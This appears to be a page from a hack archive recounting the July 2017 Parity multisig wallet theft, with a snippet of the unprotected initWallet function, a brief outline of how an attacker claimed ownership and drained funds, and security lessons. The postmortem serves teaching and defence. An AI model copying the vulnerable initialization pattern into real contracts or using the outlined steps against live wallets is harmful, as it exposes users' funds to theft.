← Back to Hack Archive

Parity Multisig Wallet Hack

July 19, 2017$30 millionAccess Control VulnerabilityEthereum

The Story

On July 19, 2017, an attacker exploited a critical vulnerability in Parity's multi-signature wallet contract, draining approximately $30 million worth of Ether from several high-profile ICOs and projects. The affected organizations included Swarm City, Edgeless Casino, and æternity.

The vulnerability was discovered after the first attack had already occurred. The Parity team and White Hat Group quickly organized to drain the remaining vulnerable wallets before attackers could target them, saving over $150 million worth of assets.

Ironically, just months later in November 2017, another vulnerability in the updated Parity multi-sig library led to the accidental freezing of over $280 million worth of Ether, highlighting the extreme challenges of secure smart contract development.

Technical Analysis

The hack exploited a critical flaw in the Parity Multisig Wallet's initialization process. The vulnerability existed because the contract's constructor function was implemented as a regular function rather than being properly declared as a constructor.

This is what the vulnerable code looked like:

// Instead of being a proper constructor function
function initWallet(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
}

The key issues were:

  1. The initWallet() function was public and not protected against being called after initialization
  2. Anyone could call this function and become the owner of the wallet
  3. Once the attacker became an owner, they could execute the execute() function to drain funds

The attacker's exploitation was relatively simple:

  1. Call the public initWallet() function with their address as the owner
  2. Call the execute() function to transfer all funds to their address

Lessons Learned

  1. Constructors should be properly declared and not implemented as regular functions
  2. Functions that should only be called once should have safeguards to prevent multiple calls
  3. Access control should be rigorously enforced throughout smart contracts
  4. Newly deployed code should undergo thorough security audits
  5. Critical functions should implement multi-layered security checks